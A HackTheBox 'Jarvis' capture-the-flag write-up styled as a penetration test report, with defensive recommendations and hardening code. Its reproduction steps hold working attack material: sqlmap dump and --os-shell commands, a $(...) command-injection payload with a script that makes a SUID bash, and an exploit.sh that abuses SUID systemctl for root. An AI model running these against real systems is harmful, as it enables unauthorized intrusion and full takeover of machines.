Jarvis CTF Writeup


Jarvis CTF

Jarvis is a medium-level Linux challenge featuring a web server with SQL injection vulnerability. Exploiting this leads to initial access. Privilege escalation involves executing a script as another user and exploiting an SUID bit set on systemctl to gain root access.


HackTheBox


Executive Summary

This report documents the findings of a penetration test conducted against the Jarvis CTF's web server, identified by the virtual host supersecurehotel.htb and IP address 10.10.10.143. The test revealed multiple vulnerabilities, ranging from SQL Injection to Vertical Privilege Escalation, which pose significant security risks to the system. Immediate actions are recommended to mitigate these vulnerabilities and enhance the security posture of the system.

Introduction

The penetration test aimed to identify and exploit vulnerabilities within the system to assess its security. The primary focus was on the web server running at 10.10.10.143, which hosts the supersecurehotel.htb site. This report provides an overview of the methodologies used, a detailed description of the vulnerabilities discovered, and recommended mitigations.

Methodology

The penetration test followed a structured approach, beginning with service enumeration to identify open ports and services. The identified services were then subjected to various attack techniques to uncover vulnerabilities. The process involved automated tools as well as manual testing to ensure comprehensive coverage.

Findings and Recommendations

Overview of Vulnerabilities

The test uncovered four critical vulnerabilities, detailed below. Each finding is accompanied by a severity rating to indicate the potential impact on the system.

BS01: SQL Injection

- Severity: Elevated
- Impact: Allows unauthorized access to potentially sensitive information from the database.
- Recommendation: Implement input validation and prepared statements to mitigate this vulnerability. It's crucial to apply a whitelist approach for input validation and to ensure that queries are safely executed.

BS02: Remote Code Execution

- Severity: High
- Impact: Permits remote attackers to execute arbitrary code on the system.
- Recommendation: Addressing the SQL Injection vulnerability (BS01) will also mitigate this issue. Additionally, ensure that the web application runs with the least privileges required, reducing the potential impact of such vulnerabilities.

BS03: Horizontal Privilege Escalation

- Severity: High
- Impact: Allows attackers to escalate privileges horizontally, gaining access as other users.
- Recommendation: Review and restrict the use of sudo privileges for scripts and ensure that scripts executed with elevated privileges do not contain vulnerabilities that could be exploited for command injection.

BS04: Vertical Privilege Escalation

- Severity: Extreme
- Impact: Enables attackers to escalate privileges from a lower-privileged user to root.
- Recommendation: Remove unnecessary SUID bits from binaries that do not require them, especially those that can execute shell commands. Regularly audit permissions and SUID bits to ensure they are only assigned where absolutely necessary.

Additional Insights

The cybersecurity landscape is continuously evolving, with new threats emerging regularly. The vulnerabilities identified in this report—SQL Injection, Remote Code Execution, Horizontal, and Vertical Privilege Escalation—are not new but remain highly effective in the attacker's arsenal due to common oversights in security practices. Recent trends show an increase in sophisticated, targeted attacks exploiting such vulnerabilities, often as entry points for more extensive breach campaigns. Organizations should stay informed about the latest threat intelligence and adapt their security strategies accordingly.

Security Best Practices

To enhance the security posture and mitigate the risk of exploitation, organizations should adopt a layered security approach. This includes not only technical measures but also administrative and physical security controls. Key best practices include, but are not limited to: the principle of least privilege, regular security audits and assessments, security awareness training, and incident response planning.

Initial Target - 10.10.10.143

Virtual Host: supersecurehotel.htb

Service Enumeration

Objective: Identify open ports and services to determine potential attack vectors.

Findings:

IP Address      Ports Open
10.10.10.143    TCP: 22 (SSH), 80 (HTTP), 64999 (Custom Service)

Analysis: The presence of SSH and HTTP indicates standard remote management and web server functionalities, respectively. The custom service running on port 64999 could represent a less conventional entry point, warranting further investigation. Initial scans suggest a potential focus on the web server for vulnerability exploitation due to its accessibility and the broad attack surface such services often present.

Target: Web Server (port 80/tcp)

Fig. 01: Jarvis CTF Web Server Home Page

BS01: SQL Injection

  • Vulnerability Explanation: A critical SQL injection flaw was discovered on supersecurehotel.htb/room.php, affecting the cod parameter. This flaw allows unauthorized database access, enabling attackers to retrieve or manipulate sensitive data. SQL injection vulnerabilities arise from improper input validation and allow attackers to inject malicious SQL code into queries.
  • Severity: Elevated
  • Recommendation: Implement stringent input validation measures, adopting a whitelist approach to only allow predefined inputs. Employing parameterized queries or prepared statements is crucial to ensure that user input is handled securely, effectively mitigating this vulnerability.
  • Steps to Reproduce:
    1. Utilize sqlmap, a tool designed for automating the detection and exploitation of SQL injection flaws.
    2. Execute the command: sqlmap -u http://supersecurehotel.htb/room.php?cod=2 -p cod -D hotel -T room --delay=3 --dump
  • Technical Insight: Although the hotel database currently lacks sensitive information, the vulnerability's existence poses a significant future risk. Its simplicity, and the fact that exploitation requires no advanced technical knowledge, elevate its severity.
Fig. 02: Screenshot illustrating a vulnerable endpoint in Jarvis CTF's web server
Fig. 03: Screenshot illustrating the output for the sqlmap command performed against Jarvis CTF web server, showing detailed information about the injection point and techniques.
Fig. 04: Screenshot illustrating another output for the sqlmap command, this time dumping the "hotel" database from Jarvis CTF
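As an added illustration of the recommendation above (not code from the box or from this writeup), the snippet below contrasts a room lookup that splices the cod parameter into the SQL text with one that checks it against a whitelist and binds it as a parameter. The table and rows are constructed, and sqlite3 stands in for the MySQL database on the target.

```python
import re
import sqlite3

ROOM_CODE = re.compile(r"[1-9][0-9]{0,4}")  # whitelist: a small positive integer, nothing else

def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the target's 'hotel' database (MySQL on the box)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE room (cod INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
    conn.executemany("INSERT INTO room VALUES (?, ?, ?)",
                     [(1, "Single", 80), (2, "Double", 120), (3, "Suite", 300)])
    return conn

def lookup_room_unsafe(conn: sqlite3.Connection, cod: str) -> list:
    """Mirrors the flaw in room.php: the raw query-string value is spliced into the SQL text."""
    return conn.execute(f"SELECT cod, name, price FROM room WHERE cod = {cod}").fetchall()

def lookup_room_safe(conn: sqlite3.Connection, cod: str) -> list:
    """Whitelist-validate cod, then bind it as a parameter so it is never parsed as SQL."""
    if not ROOM_CODE.fullmatch(cod):
        raise ValueError(f"invalid room code: {cod!r}")
    return conn.execute("SELECT cod, name, price FROM room WHERE cod = ?", (int(cod),)).fetchall()

def safe_rejects(conn: sqlite3.Connection, cod: str) -> bool:
    """True if the hardened lookup refuses the value outright."""
    try:
        lookup_room_safe(conn, cod)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = build_db()
    print("safe,   cod=2        ->", lookup_room_safe(db, "2"))
    print("unsafe, cod=2 OR 1=1 ->", lookup_room_unsafe(db, "2 OR 1=1"))  # every row comes back
    print("safe,   cod=2 OR 1=1 ->", "rejected" if safe_rejects(db, "2 OR 1=1") else "accepted")
```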

BS02: Remote Code Execution (RCE)

  • Vulnerability Explanation: Exploitation of the previously mentioned SQL injection vulnerability opens the door to executing arbitrary code on the server as the www-data user. This level of access can enable an attacker to gain control over the web server, presenting a severe security risk.
  • Severity: High
  • Recommendation: Rectifying the SQL injection vulnerability will inherently close the gap allowing for RCE. It is also advised to limit the web server's execution privileges and regularly audit for unnecessary services or applications that could increase the attack surface.
  • Steps to Reproduce:
    1. Following the injection point discovery, we'll use sqlmap to gain a shell on the server.
    2. Execute the following command: sqlmap -u http://supersecurehotel.htb/room.php?cod=2 -p cod --delay=2 --dbms=mysql --os-shell --web-root=/var/www/html --random-agent --skip-waf --batch --technique=B
Fig. 05: Screenshot illustrating a successful foothold in Jarvis CTF's linux system

Post-Exploitation

BS03: Horizontal Privilege Escalation

  • Vulnerability Explanation: The www-data user can exploit sudo permissions to execute a Python script (`simpler.py`) as the user pepper, allowing command injection and lateral movement across the system.
  • Severity: High
  • Recommendation: Audit and restrict sudo permissions, especially for scripts and binaries. Ensure that all scripts executed with elevated privileges are thoroughly vetted for vulnerabilities such as command injection.
  • Steps to Reproduce:
    1. Create a malicious script at /var/www/html/evil.sh; it will be executed later through the injection, with the permissions of the user the vulnerable script runs as:
       #!/bin/bash

       cp /bin/bash /var/www/html/
       chmod +s /var/www/html/bash
    2. Run sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
    3. Utilize command injection via the vulnerable script to execute commands as the pepper user, by typing $(bash /var/www/html/evil.sh) and pressing enter.
    4. Execute /var/www/html/bash -p to gain a shell as pepper.
Fig. 06: Screenshot illustrating user www-data executing the command sudo -l
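An added example of what the BS03 recommendation looks like in code; this is a hypothetical hardened helper, not the actual simpler.py, and it assumes the original hands user input to a shell as part of a command string. The target is accepted only if it parses as an IP address, and the command runs as an argv list with no shell, so substitutions such as $(...) are never interpreted.

```python
import ipaddress
import subprocess

# Hypothetical hardened replacement for the kind of "ping a host" helper that
# simpler.py exposes via sudo. Assumption: the original passes user input to a
# shell as part of a command string, which is what lets $(...) run commands.

def is_valid_target(raw: str) -> bool:
    """Accept only a literal IPv4/IPv6 address. No hostnames, no shell characters."""
    try:
        ipaddress.ip_address(raw.strip())
    except ValueError:
        return False
    return True

def build_ping_argv(raw: str) -> list:
    """Build an argv list. With no shell involved, $(...), ;, | and backticks are plain text."""
    if not is_valid_target(raw):
        raise ValueError(f"refusing target {raw!r}: not an IP address")
    return ["/bin/ping", "-c", "1", str(ipaddress.ip_address(raw.strip()))]

def ping(raw: str) -> int:
    """Run the ping without a shell and return its exit status."""
    return subprocess.run(build_ping_argv(raw), shell=False, check=False, timeout=15).returncode

if __name__ == "__main__":
    for candidate in ("10.10.10.143", "127.0.0.1; id", "$(bash /var/www/html/evil.sh)"):
        print(f"{candidate!r:40} ->", "allowed" if is_valid_target(candidate) else "rejected")
```

Even with the script fixed, the sudo rule granting www-data the right to run it as pepper should be reviewed, since the script itself is then the only barrier.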

BS04: Vertical Privilege Escalation

  • Vulnerability Explanation: The SUID bit set on the /bin/systemctl binary allows any user who can execute it, such as pepper, to escalate privileges to root.
  • Severity: Extreme
  • Recommendation: Conduct a thorough audit of all binaries with the SUID bit set and ensure they are necessary for their intended purpose. Remove the SUID bit from binaries that do not require it to prevent unauthorized privilege escalation.
  • Steps to Reproduce:
    1. The script below illustrates how an attacker can exploit the SUID bit on systemctl to gain root access, emphasizing the critical nature of maintaining strict permissions on sensitive binaries.

File: exploit.sh

#!/bin/bash

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
/bin/bash -p
Fig. 07: Screenshot illustrating a misconfigured SUID bit set for systemctl binary
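An added SUID audit helper, not part of the original writeup, implementing the recommendation above: it walks a tree for setuid regular files, the way find / -perm -4000 does, and flags any whose name is in a small watch list of binaries that can run commands, systemctl among them. The directory checked by demo_audit() is a constructed fixture; run find_suid("/") for a real audit.

```python
import os
import stat
import tempfile

# Binaries that should essentially never carry the SUID bit because they can
# run arbitrary commands or spawn a shell (systemctl is the one found on Jarvis).
SHELL_CAPABLE = {"systemctl", "bash", "sh", "dash", "env", "find", "python3", "vim", "less"}

def find_suid(root: str) -> list:
    """Return every regular file under root with the setuid bit set (like find -perm -4000)."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):  # symlinks are not followed
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry: skip, do not abort the audit
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def flag_dangerous(paths: list) -> list:
    """Subset of SUID files whose basename is a known command-running binary."""
    return [p for p in paths if os.path.basename(p) in SHELL_CAPABLE]

def demo_audit() -> tuple:
    """Constructed fixture: a temp tree with SUID 'systemctl' and 'passwd' and a normal 'ls'."""
    root = tempfile.mkdtemp()
    bindir = os.path.join(root, "bin")
    os.mkdir(bindir)
    for name, mode in (("systemctl", 0o4755), ("ls", 0o755), ("passwd", 0o4755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    suid = find_suid(root)
    return ([os.path.basename(p) for p in suid],
            [os.path.basename(p) for p in flag_dangerous(suid)])

if __name__ == "__main__":
    all_suid, dangerous = demo_audit()
    print("SUID files:", all_suid)          # ['passwd', 'systemctl']
    print("should not be SUID:", dangerous)  # ['systemctl']
```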

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 
